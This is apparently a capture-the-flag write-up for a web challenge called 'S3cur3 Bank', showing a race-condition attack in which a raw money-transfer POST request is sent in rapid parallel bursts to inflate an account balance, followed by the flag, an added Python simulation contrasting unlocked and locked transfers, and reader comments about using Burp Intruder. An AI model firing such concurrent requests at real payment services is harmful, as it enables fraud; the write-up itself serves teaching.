Tags: web
Rating: 5.0
# ▼▼▼S3cur3 Bank(Web:179pts:44/306solved=14.4%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
S3cur3 Bank 179
======= Difficulty level : Medium ========
It is notoriously called the most secure bank service ever. It allows us to transfer your money between 2 accounts. Can you hack the service to buy a flag???
Link(http://18.188.42.158/)
========== Authors : c3rb3ru5, SpyD3r ==========
```
---
## 【Understanding of functions】
```
・Sign up / sign in
・There are two accounts, A and B, and a function to send money to each
・The starting balance is $2000
・The flag costs $5000
```
↓
From this I guessed that the vulnerability was a `lack of exclusive processing` (a race condition).
---
## 【exploit】
Continuously send the following request to transfer money:
↓
```
POST /bank.php?id=b29d2ece084806d094fc1b4a2382b094 HTTP/1.1
Host: 18.188.42.158
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

transfer=100&account=Transfer+to+B
```
↓
Once the balance reached $5000, I bought the flag.
↓
`inctf{y0u_r4c3_v3ry_w3ll}`
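
Why a missing exclusive lock lets repeated transfers create money, and what fixes it, shown as an added example that is not part of the original writeup or the challenge's code. It is a Python simulation that assumes (hypothetically) the server reads the balance, checks it, and later writes back the stale value; the `Bank` class, the balances and the function names are constructed for illustration.

```python
import threading

class Bank:
    """In-memory stand-in for the server's balances (constructed values)."""
    def __init__(self):
        self.balance = {"A": 2000, "B": 0}
        self.lock = threading.Lock()

def transfer_unsafe(bank, amount, barrier):
    """Check-then-act with no exclusion (assumed server behaviour)."""
    seen = bank.balance["A"]           # 1. read the balance
    barrier.wait()                     # every request has read before any writes
    if seen < amount:                  # 2. check against the stale value
        return False
    bank.balance["A"] = seen - amount  # 3. write back: concurrent debits collapse
    with bank.lock:                    # credit modelled as an atomic increment,
        bank.balance["B"] += amount    #    e.g. SQL "SET bal = bal + ?"
    return True

def transfer_safe(bank, amount, barrier):
    """Same arrival pattern, but check, debit and credit share one lock."""
    barrier.wait()
    with bank.lock:
        if bank.balance["A"] < amount:
            return False
        bank.balance["A"] -= amount
        bank.balance["B"] += amount
        return True

def run(handler, requests=10, amount=100):
    """Fire `requests` simultaneous transfers; return (A, B, successes)."""
    bank, results = Bank(), []
    barrier = threading.Barrier(requests)
    def worker():
        results.append(handler(bank, amount, barrier))
    threads = [threading.Thread(target=worker) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return bank.balance["A"], bank.balance["B"], sum(results)

if __name__ == "__main__":
    print("unsafe:", run(transfer_unsafe))  # total exceeds the 2000 deposited
    print("safe:  ", run(transfer_safe))    # total stays at 2000
```

In a database-backed service the equivalent of the single lock is one transaction that locks the row (for example `SELECT ... FOR UPDATE`) or a conditional atomic update, so the balance check and the debit cannot be separated.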
Hi PwnaSonic, I can't solve this problem and I tried to follow your write-up, but I got an "Insufficient funds" message. Can you recommend something to me? Thanks
I sent it using Burp Suite's Intruder with threads = 10.